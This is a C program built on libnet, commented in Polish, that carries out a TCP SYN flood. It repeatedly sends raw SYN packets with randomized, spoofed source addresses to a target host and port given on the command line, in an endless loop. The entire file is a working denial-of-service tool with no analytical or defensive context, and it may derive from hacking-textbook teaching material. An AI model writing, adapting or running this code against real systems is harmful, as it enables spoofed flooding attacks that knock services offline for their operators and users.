#include <libnet.h>

#define FLOOD_DELAY 5000 // 5000 ms opóźnienia między wstrzyknięciami pakietów

/* zwraca adres IP w notacji x.x.x.x */
char *print_ip(u_long *ip_addr_ptr) {
   return inet_ntoa( *((struct in_addr *)ip_addr_ptr) );
}


int main(int argc, char *argv[]) {
   u_long dest_ip;
   u_short dest_port;
   u_char errbuf[LIBNET_ERRBUF_SIZE], *packet;
   int opt, network, byte_count, packet_size = LIBNET_IP_H + LIBNET_TCP_H;

   if(argc < 3)
   {
      printf("Sposób użycia:\n%s\t <host_docelowy> <port_docelowy>\n", argv[0]);
      exit(1);
   }

   dest_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE); // host 
   dest_port = (u_short) atoi(argv[2]); // port 


   network = libnet_open_raw_sock(IPPROTO_RAW); // otwórz interfejsy sieciowe
   if (network == -1)
      libnet_error(LIBNET_ERR_FATAL, "nie można otworzyć interfejsu sieciowego.  -- ten program musi być uruchomiony z uprawnieniami superużytkownika.\n");

   libnet_init_packet(packet_size, &packet); // alokuj pamięć dla pakietu
   if (packet == NULL)
      libnet_error(LIBNET_ERR_FATAL, "nie można zainicjalizować pamięci pakietu.\n");

   libnet_seed_prand(); // ziarno dla generatora liczb losowych

   printf("Zalewam pakietami SYN port %d hosta %s..\n", dest_port, print_ip(&dest_ip));
   while(1) // pętla w nieskończoność (aż do przerwania za pomocą  TRL-C) 
   {
     libnet_build_ip(LIBNET_TCP_H,      // size of the packet sans IP header 
         IPTOS_LOWDELAY,                 // IP tos 
         libnet_get_prand(LIBNET_PRu16), // IP ID (randomized) 
         0,                              // frag stuff 
         libnet_get_prand(LIBNET_PR8),   // TTL (randomized) 
         IPPROTO_TCP,                    // transport protocol 
         libnet_get_prand(LIBNET_PRu32), // source IP (randomized) 
         dest_ip,                        // destination IP 
         NULL,                           // payload (none) 
         0,                              // payload length 
         packet);                        // packet header memory 
 
      libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // source TCP port (random) 
         dest_port,                      // docelowy port TCP
         libnet_get_prand(LIBNET_PRu32), // numer sekwencyjny (randomizowany) 
         libnet_get_prand(LIBNET_PRu32), // numer potwierdzenia (randomizowany) 
         TH_SYN,                         // znczniki sterujące flags (ustawiony jest tylko SYN) 
         libnet_get_prand(LIBNET_PRu16), // rozmiar okna (randomizowany) 
         0,                              // wksaźnik pilności
         NULL,                           // ładunek (brak)
         0,                              // długość ładunku 
         packet + LIBNET_IP_H);          // pamięć nagłówka pakietu

      if (libnet_do_checksum(packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
         libnet_error(LIBNET_ERR_FATAL, "nie można obliczyć sumy kontrolnej\n");

      byte_count = libnet_write_ip(network, packet, packet_size); // inject packet 
      if (byte_count < packet_size)
         libnet_error(LIBNET_ERR_WARNING, "Uwaga: Zapisano niepełny pakiet.  (%d z %d bajtów)", byte_count, packet_size);

      usleep(FLOOD_DELAY); // odczekaj FLOOD_DELAY milisekund
   }

   libnet_destroy_packet(&packet); // zwolnij pamięć pakietu

   if (libnet_close_raw_sock(network) == -1) // zamknij interfejs sieciowy
      libnet_error(LIBNET_ERR_WARNING, "nie można zamkknąć interfejsu sieciowego.");

   return 0;
}


